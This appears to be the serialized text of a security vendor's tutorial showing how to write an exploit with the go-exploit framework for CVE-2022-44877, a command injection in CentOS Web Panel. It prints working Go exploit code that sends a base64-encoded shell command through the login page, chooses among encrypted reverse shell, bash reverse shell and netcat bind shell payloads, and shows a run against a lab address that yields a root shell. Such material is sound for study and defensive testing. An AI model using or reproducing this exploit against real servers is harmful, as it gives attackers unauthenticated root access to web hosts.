Let's start with the exploit's ",[886,97321,96820],{}," function:",[1354,97324,97326],{"className":19022,"code":97325,"language":19024,"meta":219,"style":219},"func main() {\n    supportedC2 := []c2.Impl{\n     c2.SSLShellServer,\n     c2.SimpleShellServer,\n     c2.SimpleShellClient,\n    }\n    conf := config.New(config.CodeExecution, supportedC2, \"CentOS Web Panel\", \"CVE-2022-44877\", 2031)\n    sploit := CWPInjection{}\n    exploit.RunProgram(sploit, conf)\n}\n",[886,97327,97328,97338,97354,97364,97374,97384,97388,97436,97447,97465],{"__ignoreMap":219},[1373,97329,97330,97332,97334,97336],{"class":1375,"line":1376},[1373,97331,19088],{"class":1397},[1373,97333,19186],{"class":7297},[1373,97335,7514],{"class":1383},[1373,97337,4765],{"class":1383},[1373,97339,97340,97342,97344,97346,97348,97350,97352],{"class":1375,"line":220},[1373,97341,97080],{"class":4640},[1373,97343,20584],{"class":1397},[1373,97345,66801],{"class":1383},[1373,97347,26421],{"class":14938},[1373,97349,59],{"class":1383},[1373,97351,66808],{"class":14938},[1373,97353,8904],{"class":1383},[1373,97355,97356,97358,97360,97362],{"class":1375,"line":1266},[1373,97357,97097],{"class":4640},[1373,97359,59],{"class":1383},[1373,97361,85566],{"class":4640},[1373,97363,9062],{"class":1383},[1373,97365,97366,97368,97370,97372],{"class":1375,"line":1852},[1373,97367,97097],{"class":4640},[1373,97369,59],{"class":1383},[1373,97371,38204],{"class":4640},[1373,97373,9062],{"class":1383},[1373,97375,97376,97378,97380,97382],{"class":1375,"line":4692},[1373,97377,97097],{"class":4640},[1373,97379,59],{"class":1383},[1373,97381,97112],{"class":4640},[1373,97383,9062],{"class":1383},[1373,97385,97386],{"class":1375,"line":4724},[1373,97387,4795],{"class":1383},[1373,97389,97390,97392,97394,97396,97398,97400,97402,97404,97406,97408,97410,97412,97414,97416,97419,97421,97423,97425,97427,97429,97431,97434],{"class":1375,"line":4756},[1373,97391,97123],{"class":4640},[1373,97393,20584],{"class":1397},[1373,97395,
66851],{"class":4640},[1373,97397,59],{"class":1383},[1373,97399,97132],{"class":7297},[1373,97401,1384],{"class":1383},[1373,97403,38112],{"class":4640},[1373,97405,59],{"class":1383},[1373,97407,66907],{"class":4640},[1373,97409,5437],{"class":1383},[1373,97411,66912],{"class":4640},[1373,97413,5437],{"class":1383},[1373,97415,4883],{"class":1387},[1373,97417,97418],{"class":1391},"CentOS Web Panel",[1373,97420,183],{"class":1387},[1373,97422,5437],{"class":1383},[1373,97424,4883],{"class":1387},[1373,97426,97318],{"class":1391},[1373,97428,183],{"class":1387},[1373,97430,5437],{"class":1383},[1373,97432,97433],{"class":5467}," 2031",[1373,97435,11875],{"class":1383},[1373,97437,97438,97440,97442,97445],{"class":1375,"line":4768},[1373,97439,97177],{"class":4640},[1373,97441,20584],{"class":1397},[1373,97443,97444],{"class":14938}," CWPInjection",[1373,97446,20595],{"class":1383},[1373,97448,97449,97451,97453,97455,97457,97459,97461,97463],{"class":1375,"line":4792},[1373,97450,97188],{"class":4640},[1373,97452,59],{"class":1383},[1373,97454,66972],{"class":7297},[1373,97456,1384],{"class":1383},[1373,97458,66977],{"class":4640},[1373,97460,5437],{"class":1383},[1373,97462,20633],{"class":4640},[1373,97464,11875],{"class":1383},[1373,97466,97467],{"class":1375,"line":4798},[1373,97468,1855],{"class":1383},[18,97470,97471,97472,97474],{},"There are two important aspects in the ",[886,97473,96820],{}," function. First, the exploit informs the framework about the supported command and control variants. 
This particular exploit supports three variants:",[1789,97476,97477,97483,97489],{},[25,97478,97479,97482],{},[886,97480,97481],{},"c2.SSLShellServer"," (default): An encrypted reverse shell.",[25,97484,97485,97488],{},[886,97486,97487],{},"c2.SimpleShellServer",": An unencrypted reverse shell.",[25,97490,97491,97494],{},[886,97492,97493],{},"c2.SimpleShellClient",": An unencrypted bind shell.",[18,97496,97497,97498,97500],{},"Additionally, the exploit specifies that it is a ",[886,97499,66907],{}," exploit, which means it will run code directly on the victim host. The exploit type affects the command line interface and determines which command and control options are supported. Refer to our documentation for information on other exploit types.",[18,97502,97503,97504,982,97507,97510,97511,97516,97517,97520],{},"For this example, we will skip the ",[886,97505,97506],{},"ValidateTarget",[886,97508,97509],{},"CheckVersion"," functions (you can find their implementations in our ",[47,97512,97515],{"href":97513,"rel":97514},"https:\u002F\u002Fgithub.com\u002Fvulncheck-oss\u002Fgo-exploit\u002Ftree\u002Fmain\u002Fexamples\u002Fcve-2022-44877",[51],"GitHub examples","), and instead, focus on the ",[886,97518,97519],{},"RunExploit"," function. 
It looks like this:",[1354,97522,97524],{"className":19022,"code":97523,"language":19024,"meta":219,"style":219},"func (sploit CWPInjection) RunExploit(conf *config.Config) bool {\n    generated, ok := generatePayload(conf)\n    if !ok {\n     return false\n    }\n\n    loginAttempt := map[string]string{\n     \"username\": \"%72%6f%6F%74\", \u002F\u002F root encoded\n     \"password\": random.RandLetters(8),\n     \"commit\":   \"Login\",\n    }\n    target := protocol.GenerateURL(conf.Rhost, conf.Rport, conf.SSL, \"\u002Flogin\u002Findex.php\")\n    output.PrintSuccess(\"Sending exploit to \" + target)\n\n    \u002F\u002F t=1 ET bypass\n    resp, _, ok := protocol.HTTPSendAndRecvURLEncoded(\"POST\", target+\"?t=1&login=\"+generated, loginAttempt)\n    if !ok {\n     return false\n    }\n\n    if resp.StatusCode != 200 {\n     output.PrintfError(\"Received an unexpected HTTP status code: %d\", resp.StatusCode)\n\n     return false\n    }\n    output.PrintStatus(\"Done\")\n\n    return true\n}\n",[886,97525,97526,97559,97579,97589,97596,97600,97604,97623,97655,97677,97697,97701,97749,97773,97777,97782,97836,97846,97852,97856,97860,97876,97905,97909,97915,97919,97939,97943,97949],{"__ignoreMap":219},[1373,97527,97528,97530,97532,97534,97537,97539,97541,97543,97545,97547,97549,97551,97553,97555,97557],{"class":1375,"line":1376},[1373,97529,19088],{"class":1397},[1373,97531,4641],{"class":1383},[1373,97533,38094],{"class":19096},[1373,97535,97536],{"class":14938},"CWPInjection",[1373,97538,2230],{"class":1383},[1373,97540,38102],{"class":7297},[1373,97542,1384],{"class":1383},[1373,97544,38107],{"class":19096},[1373,97546,19113],{"class":1397},[1373,97548,38112],{"class":14938},[1373,97550,59],{"class":1383},[1373,97552,38117],{"class":14938},[1373,97554,2230],{"class":1383},[1373,97556,16303],{"class":7293},[1373,97558,4765],{"class":1383},[1373,97560,97561,97564,97566,97568,97570,97573,97575,97577],{"class":1375,"line":220},[1373,97562,97563],{"class":4640},"    
generated",[1373,97565,5437],{"class":1383},[1373,97567,20610],{"class":4640},[1373,97569,20584],{"class":1397},[1373,97571,97572],{"class":7297}," generatePayload",[1373,97574,1384],{"class":1383},[1373,97576,38107],{"class":4640},[1373,97578,11875],{"class":1383},[1373,97580,97581,97583,97585,97587],{"class":1375,"line":1266},[1373,97582,4695],{"class":4636},[1373,97584,7370],{"class":1397},[1373,97586,20662],{"class":4640},[1373,97588,8904],{"class":1383},[1373,97590,97591,97594],{"class":1375,"line":1852},[1373,97592,97593],{"class":4636},"     return",[1373,97595,16195],{"class":14985},[1373,97597,97598],{"class":1375,"line":4692},[1373,97599,4795],{"class":1383},[1373,97601,97602],{"class":1375,"line":4724},[1373,97603,6520],{"emptyLinePlaceholder":237},[1373,97605,97606,97609,97611,97613,97615,97617,97619,97621],{"class":1375,"line":4756},[1373,97607,97608],{"class":4640},"    loginAttempt ",[1373,97610,20584],{"class":1397},[1373,97612,90333],{"class":1397},[1373,97614,7035],{"class":1383},[1373,97616,15752],{"class":7293},[1373,97618,15050],{"class":1383},[1373,97620,15752],{"class":7293},[1373,97622,8904],{"class":1383},[1373,97624,97625,97628,97630,97632,97634,97636,97639,97642,97645,97648,97650,97652],{"class":1375,"line":4768},[1373,97626,97627],{"class":1387},"     \"",[1373,97629,4870],{"class":1391},[1373,97631,183],{"class":1387},[1373,97633,4606],{"class":1383},[1373,97635,4883],{"class":1387},[1373,97637,97638],{"class":37971},"%72%",[1373,97640,97641],{"class":1391},"6f",[1373,97643,97644],{"class":37971},"%6F",[1373,97646,97647],{"class":1391},"%74",[1373,97649,183],{"class":1387},[1373,97651,5437],{"class":1383},[1373,97653,97654],{"class":4630}," \u002F\u002F root 
encoded\n",[1373,97656,97657,97659,97661,97663,97665,97667,97669,97671,97673,97675],{"class":1375,"line":4792},[1373,97658,97627],{"class":1387},[1373,97660,86310],{"class":1391},[1373,97662,183],{"class":1387},[1373,97664,4606],{"class":1383},[1373,97666,38269],{"class":4640},[1373,97668,59],{"class":1383},[1373,97670,38274],{"class":7297},[1373,97672,1384],{"class":1383},[1373,97674,37681],{"class":5467},[1373,97676,17933],{"class":1383},[1373,97678,97679,97681,97684,97686,97688,97690,97693,97695],{"class":1375,"line":4798},[1373,97680,97627],{"class":1387},[1373,97682,97683],{"class":1391},"commit",[1373,97685,183],{"class":1387},[1373,97687,4606],{"class":1383},[1373,97689,39881],{"class":1387},[1373,97691,97692],{"class":1391},"Login",[1373,97694,183],{"class":1387},[1373,97696,9062],{"class":1383},[1373,97698,97699],{"class":1375,"line":4806},[1373,97700,4795],{"class":1383},[1373,97702,97703,97706,97708,97710,97712,97714,97716,97718,97720,97722,97724,97726,97728,97730,97732,97734,97736,97738,97740,97742,97745,97747],{"class":1375,"line":4817},[1373,97704,97705],{"class":4640},"    target 
",[1373,97707,20584],{"class":1397},[1373,97709,20615],{"class":4640},[1373,97711,59],{"class":1383},[1373,97713,20638],{"class":7297},[1373,97715,1384],{"class":1383},[1373,97717,38107],{"class":4640},[1373,97719,59],{"class":1383},[1373,97721,38145],{"class":4640},[1373,97723,5437],{"class":1383},[1373,97725,20633],{"class":4640},[1373,97727,59],{"class":1383},[1373,97729,38154],{"class":4640},[1373,97731,5437],{"class":1383},[1373,97733,20633],{"class":4640},[1373,97735,59],{"class":1383},[1373,97737,38163],{"class":4640},[1373,97739,5437],{"class":1383},[1373,97741,4883],{"class":1387},[1373,97743,97744],{"class":1391},"\u002Flogin\u002Findex.php",[1373,97746,183],{"class":1387},[1373,97748,11875],{"class":1383},[1373,97750,97751,97753,97755,97758,97760,97762,97765,97767,97769,97771],{"class":1375,"line":4825},[1373,97752,20669],{"class":4640},[1373,97754,59],{"class":1383},[1373,97756,97757],{"class":7297},"PrintSuccess",[1373,97759,1384],{"class":1383},[1373,97761,183],{"class":1387},[1373,97763,97764],{"class":1391},"Sending exploit to ",[1373,97766,183],{"class":1387},[1373,97768,15478],{"class":1397},[1373,97770,49264],{"class":4640},[1373,97772,11875],{"class":1383},[1373,97774,97775],{"class":1375,"line":4835},[1373,97776,6520],{"emptyLinePlaceholder":237},[1373,97778,97779],{"class":1375,"line":4843},[1373,97780,97781],{"class":4630},"    \u002F\u002F t=1 ET 
bypass\n",[1373,97783,97784,97786,97788,97790,97792,97794,97796,97798,97800,97803,97805,97807,97809,97811,97813,97815,97817,97819,97822,97824,97826,97829,97831,97834],{"class":1375,"line":4849},[1373,97785,37858],{"class":4640},[1373,97787,5437],{"class":1383},[1373,97789,91080],{"class":4640},[1373,97791,5437],{"class":1383},[1373,97793,20610],{"class":4640},[1373,97795,20584],{"class":1397},[1373,97797,20615],{"class":4640},[1373,97799,59],{"class":1383},[1373,97801,97802],{"class":7297},"HTTPSendAndRecvURLEncoded",[1373,97804,1384],{"class":1383},[1373,97806,183],{"class":1387},[1373,97808,6946],{"class":1391},[1373,97810,183],{"class":1387},[1373,97812,5437],{"class":1383},[1373,97814,49264],{"class":4640},[1373,97816,15448],{"class":1397},[1373,97818,183],{"class":1387},[1373,97820,97821],{"class":1391},"?t=1&login=",[1373,97823,183],{"class":1387},[1373,97825,15448],{"class":1397},[1373,97827,97828],{"class":4640},"generated",[1373,97830,5437],{"class":1383},[1373,97832,97833],{"class":4640}," 
loginAttempt",[1373,97835,11875],{"class":1383},[1373,97837,97838,97840,97842,97844],{"class":1375,"line":4877},[1373,97839,4695],{"class":4636},[1373,97841,7370],{"class":1397},[1373,97843,20662],{"class":4640},[1373,97845,8904],{"class":1383},[1373,97847,97848,97850],{"class":1375,"line":4915},[1373,97849,97593],{"class":4636},[1373,97851,16195],{"class":14985},[1373,97853,97854],{"class":1375,"line":4931},[1373,97855,4795],{"class":1383},[1373,97857,97858],{"class":1375,"line":4947},[1373,97859,6520],{"emptyLinePlaceholder":237},[1373,97861,97862,97864,97866,97868,97870,97872,97874],{"class":1375,"line":4952},[1373,97863,4695],{"class":4636},[1373,97865,37927],{"class":4640},[1373,97867,59],{"class":1383},[1373,97869,37932],{"class":4640},[1373,97871,15677],{"class":1397},[1373,97873,6610],{"class":5467},[1373,97875,4765],{"class":1383},[1373,97877,97878,97881,97883,97885,97887,97889,97891,97893,97895,97897,97899,97901,97903],{"class":1375,"line":6776},[1373,97879,97880],{"class":4640},"     
output",[1373,97882,59],{"class":1383},[1373,97884,37961],{"class":7297},[1373,97886,1384],{"class":1383},[1373,97888,183],{"class":1387},[1373,97890,37968],{"class":1391},[1373,97892,37972],{"class":37971},[1373,97894,183],{"class":1387},[1373,97896,5437],{"class":1383},[1373,97898,37927],{"class":4640},[1373,97900,59],{"class":1383},[1373,97902,37983],{"class":4640},[1373,97904,11875],{"class":1383},[1373,97906,97907],{"class":1375,"line":6781},[1373,97908,6520],{"emptyLinePlaceholder":237},[1373,97910,97911,97913],{"class":1375,"line":7524},[1373,97912,97593],{"class":4636},[1373,97914,16195],{"class":14985},[1373,97916,97917],{"class":1375,"line":7530},[1373,97918,4795],{"class":1383},[1373,97920,97921,97923,97925,97928,97930,97932,97935,97937],{"class":1375,"line":7546},[1373,97922,20669],{"class":4640},[1373,97924,59],{"class":1383},[1373,97926,97927],{"class":7297},"PrintStatus",[1373,97929,1384],{"class":1383},[1373,97931,183],{"class":1387},[1373,97933,97934],{"class":1391},"Done",[1373,97936,183],{"class":1387},[1373,97938,11875],{"class":1383},[1373,97940,97941],{"class":1375,"line":7571},[1373,97942,6520],{"emptyLinePlaceholder":237},[1373,97944,97945,97947],{"class":1375,"line":7598},[1373,97946,7340],{"class":4636},[1373,97948,38077],{"class":14985},[1373,97950,97951],{"class":1375,"line":7615},[1373,97952,1855],{"class":1383},[18,97954,2245,97955,97957,97958,97961,97962,4606],{},[886,97956,97519],{}," function generates the required payload using the ",[886,97959,97960],{},"generatePayload"," function and then constructs the HTTP request that triggers the payload execution. 
Here's the implementation of ",[886,97963,97960],{},[1354,97965,97967],{"className":19022,"code":97966,"language":19024,"meta":219,"style":219},"func generatePayload(conf *config.Config) (string, bool) {\n    generated := \"\"\n\n    switch conf.C2Type {\n    case c2.SSLShellServer:\n     output.PrintfStatus(\"Sending an SSL reverse shell payload for port %s:%d\", conf.Lhost, conf.Lport)\n     generated = payload.ReverseShellMknodOpenSSL(conf.Lhost, conf.Lport)\n    case c2.SimpleShellServer:\n     output.PrintfStatus(\"Sending a reverse shell payload for port %s:%d\", conf.Lhost, conf.Lport)\n     generated = payload.ReverseShellBash(conf.Lhost, conf.Lport)\n    case c2.SimpleShellClient:\n     output.PrintfStatus(\"Sending a bind shell for port %d\", conf.Bport)\n     generated = payload.BindShellMkfifoNetcat(conf.Bport)\n    default:\n     output.PrintError(\"Invalid payload\")\n\n     return \"\", false\n    }\n\n    payload64 := b64.StdEncoding.EncodeToString([]byte(generated))\n    generated = \"`echo${IFS}\" + payload64 + \"|base64${IFS}-d|\u002Fbin\u002Fsh`\"\n\n    return generated, 
true\n}\n",[886,97968,97969,98001,98011,98015,98027,98039,98080,98112,98124,98165,98196,98208,98238,98261,98267,98285,98289,98299,98303,98307,98334,98361,98365,98376],{"__ignoreMap":219},[1373,97970,97971,97973,97975,97977,97979,97981,97983,97985,97987,97989,97991,97993,97995,97997,97999],{"class":1375,"line":1376},[1373,97972,19088],{"class":1397},[1373,97974,97572],{"class":7297},[1373,97976,1384],{"class":1383},[1373,97978,38107],{"class":19096},[1373,97980,19113],{"class":1397},[1373,97982,38112],{"class":14938},[1373,97984,59],{"class":1383},[1373,97986,38117],{"class":14938},[1373,97988,2230],{"class":1383},[1373,97990,4641],{"class":1383},[1373,97992,15752],{"class":7293},[1373,97994,5437],{"class":1383},[1373,97996,16303],{"class":7293},[1373,97998,2230],{"class":1383},[1373,98000,4765],{"class":1383},[1373,98002,98003,98006,98008],{"class":1375,"line":220},[1373,98004,98005],{"class":4640},"    generated ",[1373,98007,20584],{"class":1397},[1373,98009,98010],{"class":1387}," \"\"\n",[1373,98012,98013],{"class":1375,"line":1266},[1373,98014,6520],{"emptyLinePlaceholder":237},[1373,98016,98017,98019,98021,98023,98025],{"class":1375,"line":1852},[1373,98018,38182],{"class":4636},[1373,98020,20633],{"class":4640},[1373,98022,59],{"class":1383},[1373,98024,38189],{"class":4640},[1373,98026,8904],{"class":1383},[1373,98028,98029,98031,98033,98035,98037],{"class":1375,"line":4692},[1373,98030,38196],{"class":4636},[1373,98032,38199],{"class":4640},[1373,98034,59],{"class":1383},[1373,98036,85566],{"class":4640},[1373,98038,11747],{"class":1383},[1373,98040,98041,98043,98045,98047,98049,98051,98054,98056,98058,98060,98062,98064,98066,98068,98070,98072,98074,98076,98078],{"class":1375,"line":4724},[1373,98042,97880],{"class":4640},[1373,98044,59],{"class":1383},[1373,98046,38215],{"class":7297},[1373,98048,1384],{"class":1383},[1373,98050,183],{"class":1387},[1373,98052,98053],{"class":1391},"Sending an SSL reverse shell payload for port 
",[1373,98055,38048],{"class":37971},[1373,98057,4606],{"class":1391},[1373,98059,37972],{"class":37971},[1373,98061,183],{"class":1387},[1373,98063,5437],{"class":1383},[1373,98065,20633],{"class":4640},[1373,98067,59],{"class":1383},[1373,98069,38239],{"class":4640},[1373,98071,5437],{"class":1383},[1373,98073,20633],{"class":4640},[1373,98075,59],{"class":1383},[1373,98077,38248],{"class":4640},[1373,98079,11875],{"class":1383},[1373,98081,98082,98085,98087,98089,98091,98094,98096,98098,98100,98102,98104,98106,98108,98110],{"class":1375,"line":4756},[1373,98083,98084],{"class":4640},"     generated ",[1373,98086,5417],{"class":1397},[1373,98088,37845],{"class":4640},[1373,98090,59],{"class":1383},[1373,98092,98093],{"class":7297},"ReverseShellMknodOpenSSL",[1373,98095,1384],{"class":1383},[1373,98097,38107],{"class":4640},[1373,98099,59],{"class":1383},[1373,98101,38239],{"class":4640},[1373,98103,5437],{"class":1383},[1373,98105,20633],{"class":4640},[1373,98107,59],{"class":1383},[1373,98109,38248],{"class":4640},[1373,98111,11875],{"class":1383},[1373,98113,98114,98116,98118,98120,98122],{"class":1375,"line":4768},[1373,98115,38196],{"class":4636},[1373,98117,38199],{"class":4640},[1373,98119,59],{"class":1383},[1373,98121,38204],{"class":4640},[1373,98123,11747],{"class":1383},[1373,98125,98126,98128,98130,98132,98134,98136,98139,98141,98143,98145,98147,98149,98151,98153,98155,98157,98159,98161,98163],{"class":1375,"line":4792},[1373,98127,97880],{"class":4640},[1373,98129,59],{"class":1383},[1373,98131,38215],{"class":7297},[1373,98133,1384],{"class":1383},[1373,98135,183],{"class":1387},[1373,98137,98138],{"class":1391},"Sending a reverse shell payload for port 
",[1373,98140,38048],{"class":37971},[1373,98142,4606],{"class":1391},[1373,98144,37972],{"class":37971},[1373,98146,183],{"class":1387},[1373,98148,5437],{"class":1383},[1373,98150,20633],{"class":4640},[1373,98152,59],{"class":1383},[1373,98154,38239],{"class":4640},[1373,98156,5437],{"class":1383},[1373,98158,20633],{"class":4640},[1373,98160,59],{"class":1383},[1373,98162,38248],{"class":4640},[1373,98164,11875],{"class":1383},[1373,98166,98167,98169,98171,98173,98175,98178,98180,98182,98184,98186,98188,98190,98192,98194],{"class":1375,"line":4798},[1373,98168,98084],{"class":4640},[1373,98170,5417],{"class":1397},[1373,98172,37845],{"class":4640},[1373,98174,59],{"class":1383},[1373,98176,98177],{"class":7297},"ReverseShellBash",[1373,98179,1384],{"class":1383},[1373,98181,38107],{"class":4640},[1373,98183,59],{"class":1383},[1373,98185,38239],{"class":4640},[1373,98187,5437],{"class":1383},[1373,98189,20633],{"class":4640},[1373,98191,59],{"class":1383},[1373,98193,38248],{"class":4640},[1373,98195,11875],{"class":1383},[1373,98197,98198,98200,98202,98204,98206],{"class":1375,"line":4806},[1373,98199,38196],{"class":4636},[1373,98201,38199],{"class":4640},[1373,98203,59],{"class":1383},[1373,98205,97112],{"class":4640},[1373,98207,11747],{"class":1383},[1373,98209,98210,98212,98214,98216,98218,98220,98223,98225,98227,98229,98231,98233,98236],{"class":1375,"line":4817},[1373,98211,97880],{"class":4640},[1373,98213,59],{"class":1383},[1373,98215,38215],{"class":7297},[1373,98217,1384],{"class":1383},[1373,98219,183],{"class":1387},[1373,98221,98222],{"class":1391},"Sending a bind shell for port 
",[1373,98224,37972],{"class":37971},[1373,98226,183],{"class":1387},[1373,98228,5437],{"class":1383},[1373,98230,20633],{"class":4640},[1373,98232,59],{"class":1383},[1373,98234,98235],{"class":4640},"Bport",[1373,98237,11875],{"class":1383},[1373,98239,98240,98242,98244,98246,98248,98251,98253,98255,98257,98259],{"class":1375,"line":4825},[1373,98241,98084],{"class":4640},[1373,98243,5417],{"class":1397},[1373,98245,37845],{"class":4640},[1373,98247,59],{"class":1383},[1373,98249,98250],{"class":7297},"BindShellMkfifoNetcat",[1373,98252,1384],{"class":1383},[1373,98254,38107],{"class":4640},[1373,98256,59],{"class":1383},[1373,98258,98235],{"class":4640},[1373,98260,11875],{"class":1383},[1373,98262,98263,98265],{"class":1375,"line":4835},[1373,98264,38773],{"class":4636},[1373,98266,11747],{"class":1383},[1373,98268,98269,98271,98273,98275,98277,98279,98281,98283],{"class":1375,"line":4843},[1373,98270,97880],{"class":4640},[1373,98272,59],{"class":1383},[1373,98274,20674],{"class":7297},[1373,98276,1384],{"class":1383},[1373,98278,183],{"class":1387},[1373,98280,38790],{"class":1391},[1373,98282,183],{"class":1387},[1373,98284,11875],{"class":1383},[1373,98286,98287],{"class":1375,"line":4849},[1373,98288,6520],{"emptyLinePlaceholder":237},[1373,98290,98291,98293,98295,98297],{"class":1375,"line":4877},[1373,98292,97593],{"class":4636},[1373,98294,16579],{"class":1387},[1373,98296,5437],{"class":1383},[1373,98298,16195],{"class":14985},[1373,98300,98301],{"class":1375,"line":4915},[1373,98302,4795],{"class":1383},[1373,98304,98305],{"class":1375,"line":4931},[1373,98306,6520],{"emptyLinePlaceholder":237},[1373,98308,98309,98312,98314,98316,98318,98320,98322,98324,98326,98328,98330,98332],{"class":1375,"line":4947},[1373,98310,98311],{"class":4640},"    payload64 
",[1373,98313,20584],{"class":1397},[1373,98315,82963],{"class":4640},[1373,98317,59],{"class":1383},[1373,98319,82968],{"class":4640},[1373,98321,59],{"class":1383},[1373,98323,82973],{"class":7297},[1373,98325,82976],{"class":1383},[1373,98327,82979],{"class":7293},[1373,98329,1384],{"class":1383},[1373,98331,97828],{"class":4640},[1373,98333,16761],{"class":1383},[1373,98335,98336,98338,98340,98342,98345,98347,98349,98352,98354,98356,98359],{"class":1375,"line":4952},[1373,98337,98005],{"class":4640},[1373,98339,5417],{"class":1397},[1373,98341,4883],{"class":1387},[1373,98343,98344],{"class":1391},"`echo${IFS}",[1373,98346,183],{"class":1387},[1373,98348,15478],{"class":1397},[1373,98350,98351],{"class":4640}," payload64 ",[1373,98353,15448],{"class":1397},[1373,98355,4883],{"class":1387},[1373,98357,98358],{"class":1391},"|base64${IFS}-d|\u002Fbin\u002Fsh`",[1373,98360,19057],{"class":1387},[1373,98362,98363],{"class":1375,"line":6776},[1373,98364,6520],{"emptyLinePlaceholder":237},[1373,98366,98367,98369,98372,98374],{"class":1375,"line":6781},[1373,98368,7340],{"class":4636},[1373,98370,98371],{"class":4640}," generated",[1373,98373,5437],{"class":1383},[1373,98375,38077],{"class":14985},[1373,98377,98378],{"class":1375,"line":7524},[1373,98379,1855],{"class":1383},[18,98381,98382],{},"Above, we can see the implementation of the payloads for the three supported command and control variants. In this example, each variant can utilize a predefined payload provided by the exploit framework.",[18,98384,98385],{},"Finally, the exploit can be executed against the target. 
The output might look like this:",[1354,98387,98389],{"className":31740,"code":98388,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Fgo-exploit\u002Fexamples\u002Fcve-2022-44877$ .\u002Fcve-2022-44877 -a -c -v -e -rhost 10.9.49.214 -lhost 10.9.49.186 -lport 1270\n[*] Validating the remote target is a CentOS Web Panel installation\n[+] Target validation succeeded!\n[*] Running a version check on the remote target\n[-] broken.jpg has been modified since April 3, 2022. This instance *might* be vulnerable.\n[*] The target *might* be a vulnerable version. Continuing.\n[*] Generating a TLS Certificate\n[*] Starting TLS listener on 10.9.49.186:1270\n[*] Sending an SSL reverse shell payload for port 10.9.49.186:1270\n[+] Sending exploit to https:\u002F\u002F10.9.49.214:2031\u002Flogin\u002Findex.php\n[+] Caught new shell from 10.9.49.214:35868\n[*] Active shell from 10.9.49.214:35868\n$ whoami\nsh: no job control in this shell\nsh-4.2# whoami\nroot\n$ pwd\npwd\n\u002Ftmp\n$\n",[886,98390,98391,98421,98432,98446,98475,98496,98516,98527,98538,98555,98566,98577,98588,98595,98615,98622,98627,98634,98639,98644],{"__ignoreMap":219},[1373,98392,98393,98396,98399,98401,98403,98405,98407,98409,98412,98414,98417,98419],{"class":1375,"line":1376},[1373,98394,98395],{"class":2206},"albinolobster@mournland:~\u002Fgo-exploit\u002Fexamples\u002Fcve-2022-44877$",[1373,98397,98398],{"class":1391}," .\u002Fcve-2022-44877",[1373,98400,74504],{"class":2209},[1373,98402,45587],{"class":2209},[1373,98404,45584],{"class":2209},[1373,98406,38907],{"class":2209},[1373,98408,38910],{"class":2209},[1373,98410,98411],{"class":5467}," 10.9.49.214",[1373,98413,38916],{"class":2209},[1373,98415,98416],{"class":5467}," 
10.9.49.186",[1373,98418,38922],{"class":2209},[1373,98420,38925],{"class":5467},[1373,98422,98423,98425,98427,98429],{"class":1375,"line":220},[1373,98424,7035],{"class":1383},[1373,98426,35613],{"class":1397},[1373,98428,15050],{"class":1383},[1373,98430,98431],{"class":4640}," Validating the remote target is a CentOS Web Panel installation\n",[1373,98433,98434,98436,98438,98440,98443],{"class":1375,"line":1266},[1373,98435,7035],{"class":1383},[1373,98437,15448],{"class":4640},[1373,98439,15050],{"class":1383},[1373,98441,98442],{"class":4640}," Target validation succeeded",[1373,98444,98445],{"class":1397},"!\n",[1373,98447,98448,98450,98452,98454,98457,98459,98461,98464,98467,98469,98472],{"class":1375,"line":1852},[1373,98449,7035],{"class":1383},[1373,98451,35613],{"class":1397},[1373,98453,15050],{"class":1383},[1373,98455,98456],{"class":2206}," Running",[1373,98458,52105],{"class":1391},[1373,98460,45880],{"class":1391},[1373,98462,98463],{"class":1391}," check",[1373,98465,98466],{"class":1391}," on",[1373,98468,57354],{"class":1391},[1373,98470,98471],{"class":1391}," remote",[1373,98473,98474],{"class":1391}," target\n",[1373,98476,98477,98479,98481,98483,98486,98488,98491,98493],{"class":1375,"line":4692},[1373,98478,7035],{"class":1383},[1373,98480,61062],{"class":4640},[1373,98482,15050],{"class":1383},[1373,98484,98485],{"class":4640}," broken.jpg has been modified since April 3, 2022. 
This instance ",[1373,98487,35613],{"class":1397},[1373,98489,98490],{"class":4640},"might",[1373,98492,35613],{"class":1397},[1373,98494,98495],{"class":4640}," be vulnerable.\n",[1373,98497,98498,98500,98502,98504,98507,98509,98511,98513],{"class":1375,"line":4724},[1373,98499,7035],{"class":1383},[1373,98501,35613],{"class":1397},[1373,98503,15050],{"class":1383},[1373,98505,98506],{"class":4640}," The target ",[1373,98508,35613],{"class":1397},[1373,98510,98490],{"class":4640},[1373,98512,35613],{"class":1397},[1373,98514,98515],{"class":4640}," be a vulnerable version. Continuing.\n",[1373,98517,98518,98520,98522,98524],{"class":1375,"line":4756},[1373,98519,7035],{"class":1383},[1373,98521,35613],{"class":1397},[1373,98523,15050],{"class":1383},[1373,98525,98526],{"class":4640}," Generating a TLS Certificate\n",[1373,98528,98529,98531,98533,98535],{"class":1375,"line":4768},[1373,98530,7035],{"class":1383},[1373,98532,35613],{"class":1397},[1373,98534,15050],{"class":1383},[1373,98536,98537],{"class":4640}," Starting TLS listener on 10.9.49.186:1270\n",[1373,98539,98540,98542,98544,98546,98549,98552],{"class":1375,"line":4792},[1373,98541,7035],{"class":1383},[1373,98543,35613],{"class":1397},[1373,98545,15050],{"class":1383},[1373,98547,98548],{"class":4640}," Sending an SSL reverse shell payload ",[1373,98550,98551],{"class":4636},"for",[1373,98553,98554],{"class":4640}," port 10.9.49.186:1270\n",[1373,98556,98557,98559,98561,98563],{"class":1375,"line":4798},[1373,98558,7035],{"class":1383},[1373,98560,15448],{"class":4640},[1373,98562,15050],{"class":1383},[1373,98564,98565],{"class":4640}," Sending exploit to https:\u002F\u002F10.9.49.214:2031\u002Flogin\u002Findex.php\n",[1373,98567,98568,98570,98572,98574],{"class":1375,"line":4806},[1373,98569,7035],{"class":1383},[1373,98571,15448],{"class":4640},[1373,98573,15050],{"class":1383},[1373,98575,98576],{"class":4640}," Caught new shell from 
